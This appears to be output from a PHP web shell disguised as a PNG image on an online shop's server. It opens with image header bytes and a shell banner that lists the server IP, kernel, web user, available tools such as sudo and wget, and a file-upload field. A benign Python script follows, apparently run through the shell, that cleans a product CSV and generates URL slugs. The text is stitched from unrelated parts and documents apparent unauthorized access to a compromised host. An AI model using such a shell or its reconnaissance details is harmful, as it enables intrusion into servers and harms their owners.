PNG IHDR wSȚ -tEXtComment Nxplo
| Server IP : 144.76.1.235 / Your IP : 216.73.216.244 Web Server : Apache/2.4.52 (Ubuntu) System : Linux einkaufsring.com 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.3.16 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/shop.einkaufsring.com/ |
Upload File : |
python3 - <<'PY'
import csv, sys, os, re, unicodedata
# Input export and the location of the sanitized copy this script produces.
src = "/var/www/shop.einkaufsring.com/var/import/products/Artikelexport.csv"
dst = "/tmp/Artikelexport_sanitized.csv"

# Read the raw bytes inside a context manager so the handle is closed
# deterministically instead of being left to the garbage collector.
with open(src, 'rb') as fh:
    raw = fh.read()

# Strip a leading UTF-8 byte-order mark if present.
if raw.startswith(b'\xef\xbb\xbf'):
    raw = raw[3:]

# Decode leniently (invalid bytes become U+FFFD) and normalize every line
# ending -- CRLF first, then lone CR -- to '\n'.
text = raw.decode('utf-8', errors='replace').replace('\r\n', '\n').replace('\r', '\n')
def clean_header(h):
    """Return a normalized column name for a raw CSV header cell.

    Processing steps:
      * ``None`` becomes the empty string.
      * Every Unicode separator (categories Zs, Zl, Zp -- e.g. NBSP or the
        ideographic space) is replaced by a plain ASCII space.
      * Every control character (category Cc, covering both the C0 and C1
        ranges plus DEL) and every invisible format character (category Cf,
        e.g. a stray U+FEFF BOM, zero-width space, soft hyphen) is removed.
        Such characters are invisible in editors but would make a header
        compare unequal to the expected column name.
      * Leading/trailing spaces and double quotes are trimmed.
    """
    if h is None:
        return ''
    cleaned = []
    for ch in h:
        category = unicodedata.category(ch)
        if category in ('Zs', 'Zl', 'Zp'):
            cleaned.append(' ')
        elif category not in ('Cc', 'Cf'):
            cleaned.append(ch)
    # Tabs/newlines are category Cc and are already gone, so only spaces and
    # quotes can remain at the edges.
    return ''.join(cleaned).strip(' "')
# Parse the normalized text as CSV.  Each line is handed to csv.reader with
# its '\n' terminator restored: the reader only preserves line breaks inside
# quoted fields when the terminator is present, otherwise the two halves of
# such a field are silently glued together.
# Completely empty records (blank lines, including leading ones and the
# fragment after the final newline) are dropped here so that the first
# remaining row really is the header and an empty file yields no rows.
rows = [
    record
    for record in csv.reader(line + '\n' for line in text.split('\n'))
    if any(record)
]
if not rows:
    print("Empty CSV", file=sys.stderr)
    sys.exit(2)

header = [clean_header(h) for h in rows[0]]

# De-duplicate column names case-insensitively, keeping the first occurrence
# and discarding unnamed columns.  idx_map[j] is the source column index of
# the j-th surviving header.
seen = set()
new_header = []
idx_map = []
for i, h in enumerate(header):
    k = h.lower()
    if not k or k in seen:
        continue
    seen.add(k)
    new_header.append(h)
    idx_map.append(i)

# Drop the visibility column; keep_idx indexes into new_header / idx_map.
keep_idx = [i for i, h in enumerate(new_header) if h.lower() != "visibility"]
header2 = [new_header[i] for i in keep_idx]

# Make sure the output always carries product_online and url_key columns,
# appending them (in that order) when the export lacks them.
for required in ("product_online", "url_key"):
    if required not in (h.lower() for h in header2):
        header2.append(required)

# Lower-cased column name -> position in the output row.
lower_index = {h.lower(): j for j, h in enumerate(header2)}
# Letters that have no NFKD decomposition and would otherwise be deleted by
# the ASCII 'ignore' step in slugify() (e.g. "Fußball" -> "fuball").
_SLUG_FALLBACKS = str.maketrans({
    'ß': 'ss', 'ẞ': 'SS',
    'æ': 'ae', 'Æ': 'AE',
    'œ': 'oe', 'Œ': 'OE',
    'ø': 'o', 'Ø': 'O',
    'ł': 'l', 'Ł': 'L',
    'đ': 'd', 'Đ': 'D',
})


def slugify(s):
    """Return a lower-case, ASCII-only, hyphen-separated slug for *s*.

    Accented letters are reduced to their base letter via NFKD
    decomposition; letters without a decomposition (ß, æ, œ, ø, ł, đ) are
    transliterated through ``_SLUG_FALLBACKS`` first so they are not lost.
    Every run of characters outside ``[a-zA-Z0-9]`` collapses into a single
    ``-`` and leading/trailing hyphens are trimmed.

    Returns ``'item'`` when *s* is empty/``None`` or when nothing usable
    remains after cleaning.
    """
    if not s:
        return "item"
    t = unicodedata.normalize('NFKD', s.translate(_SLUG_FALLBACKS))
    t = t.encode('ascii', 'ignore').decode('ascii')
    t = re.sub(r'[^a-zA-Z0-9]+', '-', t).strip('-').lower()
    return t or 'item'
# Build the output table: header first, then one sanitized row per record.
out = [header2]
seen_urls = set()

# Column positions are loop-invariant, so resolve them once.
online_idx = lower_index["product_online"]
url_idx = lower_index["url_key"]
sku_idx = lower_index.get("sku")
name_idx = lower_index.get("name")

for rawrow in rows[1:]:
    # Skip records in which every cell is empty.
    if not any(rawrow):
        continue

    # Project the record through the header de-duplication (short records
    # are padded with ''), then through the visibility drop, then pad for
    # any columns appended to the header.
    row1 = [rawrow[i] if i < len(rawrow) else '' for i in idx_map]
    row2 = [row1[i] for i in keep_idx]
    row2 += [''] * (len(header2) - len(row2))

    # product_online is forced to '1' for every row.
    row2[online_idx] = '1'

    sku = row2[sku_idx] if sku_idx is not None else ''
    name = row2[name_idx] if name_idx is not None else ''

    url = (row2[url_idx] or '').strip()
    if url:
        cand = slugify(url)
    else:
        # Derive the key from name and SKU together.  Running both through
        # slugify() keeps spaces, slashes etc. in a SKU out of the url_key
        # and avoids emitting the SKU twice when the name is empty.
        cand = slugify(f"{name} {sku}")

    # Guarantee uniqueness within this file by appending -2, -3, ... until
    # the key has not been used yet.
    u = cand
    n = 1
    while u in seen_urls:
        n += 1
        u = f"{cand}-{n}"
    seen_urls.add(u)
    row2[url_idx] = u
    out.append(row2)

# newline='' lets the csv module control line endings itself.
with open(dst, 'w', newline='', encoding='utf-8') as g:
    csv.writer(g).writerows(out)

# Emit the path of the sanitized file for the caller.
print(dst)
PY